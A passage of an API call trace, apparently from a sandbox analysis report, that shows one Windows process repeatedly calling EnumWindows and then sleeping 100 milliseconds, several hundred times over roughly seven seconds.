(lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.550] Sleep (dwMilliseconds=0x64) [0176.562] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.562] Sleep (dwMilliseconds=0x64) [0176.594] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.594] Sleep (dwMilliseconds=0x64) [0176.667] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.667] Sleep (dwMilliseconds=0x64) [0176.808] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.809] Sleep (dwMilliseconds=0x64) [0176.948] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0176.948] Sleep (dwMilliseconds=0x64) [0177.030] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.030] Sleep (dwMilliseconds=0x64) [0177.075] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.076] Sleep (dwMilliseconds=0x64) [0177.117] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.117] Sleep (dwMilliseconds=0x64) [0177.152] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.152] Sleep (dwMilliseconds=0x64) [0177.157] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.158] Sleep (dwMilliseconds=0x64) [0177.164] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.164] Sleep (dwMilliseconds=0x64) [0177.166] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.166] Sleep (dwMilliseconds=0x64) [0177.169] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.169] Sleep (dwMilliseconds=0x64) [0177.174] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.174] Sleep (dwMilliseconds=0x64) [0177.178] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.178] Sleep (dwMilliseconds=0x64) [0177.181] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.181] Sleep (dwMilliseconds=0x64) [0177.186] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.186] Sleep (dwMilliseconds=0x64) [0177.189] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.190] Sleep (dwMilliseconds=0x64) [0177.217] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.218] Sleep (dwMilliseconds=0x64) [0177.220] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.221] Sleep (dwMilliseconds=0x64) [0177.226] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.226] Sleep (dwMilliseconds=0x64) [0177.229] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.230] Sleep (dwMilliseconds=0x64) [0177.283] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.284] Sleep (dwMilliseconds=0x64) [0177.362] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.363] Sleep (dwMilliseconds=0x64) [0177.477] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.477] Sleep (dwMilliseconds=0x64) [0177.545] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.545] Sleep (dwMilliseconds=0x64) [0177.585] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.586] Sleep (dwMilliseconds=0x64) [0177.626] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.626] Sleep (dwMilliseconds=0x64) [0177.663] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.664] Sleep (dwMilliseconds=0x64) [0177.705] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.705] Sleep (dwMilliseconds=0x64) [0177.720] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.720] Sleep (dwMilliseconds=0x64) [0177.725] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.726] Sleep (dwMilliseconds=0x64) [0177.731] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.732] Sleep (dwMilliseconds=0x64) [0177.734] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.735] Sleep (dwMilliseconds=0x64) [0177.739] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.740] Sleep (dwMilliseconds=0x64) [0177.744] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.744] Sleep (dwMilliseconds=0x64) [0177.748] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.748] Sleep (dwMilliseconds=0x64) [0177.751] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.751] Sleep (dwMilliseconds=0x64) [0177.755] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.755] Sleep (dwMilliseconds=0x64) [0177.781] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.782] Sleep (dwMilliseconds=0x64) [0177.784] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.785] Sleep (dwMilliseconds=0x64) [0177.787] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.787] Sleep (dwMilliseconds=0x64) [0177.790] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.790] Sleep (dwMilliseconds=0x64) [0177.792] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.793] Sleep (dwMilliseconds=0x64) [0177.796] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.796] Sleep (dwMilliseconds=0x64) [0177.800] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.800] Sleep (dwMilliseconds=0x64) [0177.840] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.840] Sleep (dwMilliseconds=0x64) [0177.917] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.917] Sleep (dwMilliseconds=0x64) [0177.983] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0177.983] Sleep (dwMilliseconds=0x64) [0178.166] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.167] Sleep (dwMilliseconds=0x64) [0178.321] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.321] Sleep (dwMilliseconds=0x64) [0178.366] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.367] Sleep (dwMilliseconds=0x64) [0178.407] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.407] Sleep (dwMilliseconds=0x64) [0178.433] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.433] Sleep (dwMilliseconds=0x64) [0178.439] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.440] Sleep (dwMilliseconds=0x64) [0178.445] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.445] Sleep (dwMilliseconds=0x64) [0178.448] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.448] Sleep (dwMilliseconds=0x64) [0178.455] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.455] Sleep (dwMilliseconds=0x64) [0178.460] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.460] Sleep (dwMilliseconds=0x64) [0178.472] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.472] Sleep (dwMilliseconds=0x64) [0178.488] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.489] Sleep (dwMilliseconds=0x64) [0178.532] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.532] Sleep (dwMilliseconds=0x64) [0178.623] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.623] Sleep (dwMilliseconds=0x64) [0178.688] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.689] Sleep (dwMilliseconds=0x64) [0178.728] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.728] Sleep (dwMilliseconds=0x64) [0178.768] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.769] Sleep (dwMilliseconds=0x64) [0178.811] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.812] Sleep (dwMilliseconds=0x64) [0178.852] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.852] Sleep (dwMilliseconds=0x64) [0178.873] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.873] Sleep (dwMilliseconds=0x64) [0178.877] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.877] Sleep (dwMilliseconds=0x64) [0178.882] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.882] Sleep (dwMilliseconds=0x64) [0178.886] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.886] Sleep (dwMilliseconds=0x64) [0178.896] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.897] Sleep (dwMilliseconds=0x64) [0178.901] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.902] Sleep (dwMilliseconds=0x64) [0178.905] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.906] Sleep (dwMilliseconds=0x64) [0178.910] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.911] Sleep (dwMilliseconds=0x64) [0178.914] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.914] Sleep (dwMilliseconds=0x64) [0178.917] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.917] Sleep (dwMilliseconds=0x64) [0178.920] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.920] Sleep (dwMilliseconds=0x64) [0178.938] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.939] Sleep (dwMilliseconds=0x64) [0178.944] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.945] Sleep (dwMilliseconds=0x64) [0178.947] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.947] Sleep (dwMilliseconds=0x64) [0178.951] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.952] Sleep (dwMilliseconds=0x64) [0178.954] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.954] Sleep (dwMilliseconds=0x64) [0178.993] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0178.994] Sleep (dwMilliseconds=0x64) [0179.082] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.082] Sleep (dwMilliseconds=0x64) [0179.188] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.189] Sleep (dwMilliseconds=0x64) [0179.337] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.338] Sleep (dwMilliseconds=0x64) [0179.382] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.382] Sleep (dwMilliseconds=0x64) [0179.423] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.423] Sleep (dwMilliseconds=0x64) [0179.465] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.465] Sleep (dwMilliseconds=0x64) [0179.497] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.497] Sleep (dwMilliseconds=0x64) [0179.500] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.501] Sleep (dwMilliseconds=0x64) [0179.505] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.505] Sleep (dwMilliseconds=0x64) [0179.509] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.509] Sleep (dwMilliseconds=0x64) [0179.513] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.513] Sleep (dwMilliseconds=0x64) [0179.515] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.515] Sleep (dwMilliseconds=0x64) [0179.518] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.518] Sleep (dwMilliseconds=0x64) [0179.525] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.526] Sleep (dwMilliseconds=0x64) [0179.541] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.541] Sleep (dwMilliseconds=0x64) [0179.545] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.545] Sleep (dwMilliseconds=0x64) [0179.549] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.549] Sleep (dwMilliseconds=0x64) [0179.551] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.551] Sleep (dwMilliseconds=0x64) [0179.555] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.555] Sleep (dwMilliseconds=0x64) [0179.560] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.560] Sleep (dwMilliseconds=0x64) [0179.578] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.578] Sleep (dwMilliseconds=0x64) [0179.607] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.607] Sleep (dwMilliseconds=0x64) [0179.683] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.684] Sleep (dwMilliseconds=0x64) [0179.779] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.779] Sleep (dwMilliseconds=0x64) [0179.871] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.871] Sleep (dwMilliseconds=0x64) [0179.910] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.911] Sleep (dwMilliseconds=0x64) [0179.956] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.957] Sleep (dwMilliseconds=0x64) [0179.994] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0179.994] Sleep (dwMilliseconds=0x64) [0180.033] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.034] Sleep (dwMilliseconds=0x64) [0180.038] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.038] Sleep (dwMilliseconds=0x64) [0180.042] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.042] Sleep (dwMilliseconds=0x64) [0180.046] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.046] Sleep (dwMilliseconds=0x64) [0180.050] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.050] Sleep (dwMilliseconds=0x64) [0180.054] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.054] Sleep (dwMilliseconds=0x64) [0180.088] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.088] Sleep (dwMilliseconds=0x64) [0180.107] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.108] Sleep (dwMilliseconds=0x64) [0180.114] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.115] Sleep (dwMilliseconds=0x64) [0180.123] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.123] Sleep (dwMilliseconds=0x64) [0180.157] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.158] Sleep (dwMilliseconds=0x64) [0180.212] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.212] Sleep (dwMilliseconds=0x64) [0180.250] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.250] Sleep (dwMilliseconds=0x64) [0180.290] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.290] Sleep (dwMilliseconds=0x64) [0180.333] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.333] Sleep (dwMilliseconds=0x64) [0180.377] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.377] Sleep (dwMilliseconds=0x64) [0180.509] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.509] Sleep (dwMilliseconds=0x64) [0180.555] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.555] Sleep (dwMilliseconds=0x64) [0180.559] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.559] Sleep (dwMilliseconds=0x64) [0180.562] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.563] Sleep (dwMilliseconds=0x64) [0180.566] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.566] Sleep (dwMilliseconds=0x64) [0180.570] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.570] Sleep (dwMilliseconds=0x64) [0180.576] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.576] Sleep (dwMilliseconds=0x64) [0180.582] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.582] Sleep (dwMilliseconds=0x64) [0180.585] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.586] Sleep (dwMilliseconds=0x64) [0180.589] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.589] Sleep (dwMilliseconds=0x64) [0180.593] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.593] Sleep (dwMilliseconds=0x64) [0180.600] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.600] Sleep (dwMilliseconds=0x64) [0180.603] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.604] Sleep (dwMilliseconds=0x64) [0180.609] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.609] Sleep (dwMilliseconds=0x64) [0180.616] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.616] Sleep (dwMilliseconds=0x64) [0180.620] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.620] Sleep (dwMilliseconds=0x64) [0180.622] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.623] Sleep (dwMilliseconds=0x64) [0180.626] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.626] Sleep (dwMilliseconds=0x64) [0180.648] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.649] Sleep (dwMilliseconds=0x64) [0180.697] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.697] Sleep (dwMilliseconds=0x64) [0180.789] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.789] Sleep (dwMilliseconds=0x64) [0180.900] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.900] Sleep (dwMilliseconds=0x64) [0180.957] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0180.957] Sleep (dwMilliseconds=0x64) [0181.050] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.050] Sleep (dwMilliseconds=0x64) [0181.096] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.096] Sleep (dwMilliseconds=0x64) [0181.138] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.138] Sleep (dwMilliseconds=0x64) [0181.178] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.178] Sleep (dwMilliseconds=0x64) [0181.222] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.223] Sleep (dwMilliseconds=0x64) [0181.268] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.268] Sleep (dwMilliseconds=0x64) [0181.275] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.276] Sleep (dwMilliseconds=0x64) [0181.278] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.279] Sleep (dwMilliseconds=0x64) [0181.283] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.283] Sleep (dwMilliseconds=0x64) [0181.288] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.288] Sleep (dwMilliseconds=0x64) [0181.293] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.293] Sleep (dwMilliseconds=0x64) [0181.336] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.337] Sleep (dwMilliseconds=0x64) [0181.383] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.383] Sleep (dwMilliseconds=0x64) [0181.574] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.574] Sleep (dwMilliseconds=0x64) [0181.582] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.582] Sleep (dwMilliseconds=0x64) [0181.667] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.667] Sleep (dwMilliseconds=0x64) [0181.725] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.725] Sleep (dwMilliseconds=0x64) [0181.793] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.793] Sleep (dwMilliseconds=0x64) [0181.836] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.837] Sleep (dwMilliseconds=0x64) [0181.877] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.877] Sleep (dwMilliseconds=0x64) [0181.953] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.953] Sleep (dwMilliseconds=0x64) [0181.994] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0181.994] Sleep (dwMilliseconds=0x64) [0182.015] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.015] Sleep (dwMilliseconds=0x64) [0182.022] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.022] Sleep (dwMilliseconds=0x64) [0182.026] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.026] Sleep (dwMilliseconds=0x64) [0182.029] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.029] Sleep (dwMilliseconds=0x64) [0182.034] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.035] Sleep (dwMilliseconds=0x64) [0182.038] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.038] Sleep (dwMilliseconds=0x64) [0182.040] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.041] Sleep (dwMilliseconds=0x64) [0182.044] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.044] Sleep (dwMilliseconds=0x64) [0182.066] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.066] Sleep (dwMilliseconds=0x64) [0182.160] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.160] Sleep (dwMilliseconds=0x64) [0182.239] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.240] Sleep (dwMilliseconds=0x64) [0182.368] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.368] Sleep (dwMilliseconds=0x64) [0182.447] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.447] Sleep (dwMilliseconds=0x64) [0182.488] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.489] Sleep (dwMilliseconds=0x64) [0182.530] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.531] Sleep (dwMilliseconds=0x64) [0182.574] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.575] Sleep (dwMilliseconds=0x64) [0182.613] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.613] Sleep (dwMilliseconds=0x64) [0182.638] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.638] Sleep (dwMilliseconds=0x64) [0182.642] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.643] Sleep (dwMilliseconds=0x64) [0182.650] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.650] Sleep (dwMilliseconds=0x64) [0182.654] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.654] Sleep (dwMilliseconds=0x64) [0182.660] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.660] Sleep (dwMilliseconds=0x64) [0182.663] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.664] Sleep (dwMilliseconds=0x64) [0182.669] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.669] Sleep (dwMilliseconds=0x64) [0182.679] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.679] Sleep (dwMilliseconds=0x64) [0182.682] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.682] Sleep (dwMilliseconds=0x64) [0182.701] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.701] Sleep (dwMilliseconds=0x64) [0182.737] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.737] Sleep (dwMilliseconds=0x64) [0182.814] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.815] Sleep (dwMilliseconds=0x64) [0182.899] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.900] Sleep (dwMilliseconds=0x64) [0182.954] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.955] Sleep (dwMilliseconds=0x64) [0182.996] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0182.996] Sleep (dwMilliseconds=0x64) [0183.038] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.039] Sleep (dwMilliseconds=0x64) [0183.083] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.083] Sleep (dwMilliseconds=0x64) [0183.130] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.130] Sleep (dwMilliseconds=0x64) [0183.151] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.152] Sleep (dwMilliseconds=0x64) [0183.159] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.159] Sleep (dwMilliseconds=0x64) [0183.162] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.162] Sleep (dwMilliseconds=0x64) [0183.166] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.166] Sleep (dwMilliseconds=0x64) [0183.169] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.169] Sleep (dwMilliseconds=0x64) [0183.174] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.174] Sleep (dwMilliseconds=0x64) [0183.177] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.177] Sleep (dwMilliseconds=0x64) [0183.181] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.181] Sleep (dwMilliseconds=0x64) [0183.193] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.193] Sleep (dwMilliseconds=0x64) [0183.197] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.197] Sleep (dwMilliseconds=0x64) [0183.200] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.200] Sleep (dwMilliseconds=0x64) [0183.203] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.203] Sleep (dwMilliseconds=0x64) [0183.205] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.206] Sleep (dwMilliseconds=0x64) [0183.209] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.210] Sleep (dwMilliseconds=0x64) [0183.218] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.218] Sleep (dwMilliseconds=0x64) [0183.231] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.232] Sleep (dwMilliseconds=0x64) [0183.260] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.261] Sleep (dwMilliseconds=0x64) [0183.352] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.352] Sleep (dwMilliseconds=0x64) [0183.448] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.448] Sleep (dwMilliseconds=0x64) [0183.517] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.517] Sleep (dwMilliseconds=0x64) [0183.558] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.558] Sleep (dwMilliseconds=0x64) [0183.599] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.599] Sleep (dwMilliseconds=0x64) [0183.645] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.645] Sleep (dwMilliseconds=0x64) [0183.678] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0183.678] Sleep (dwMilliseconds=0x64) [0183.680] EnumWindows (lpEnumFunc=0x2843dc0, 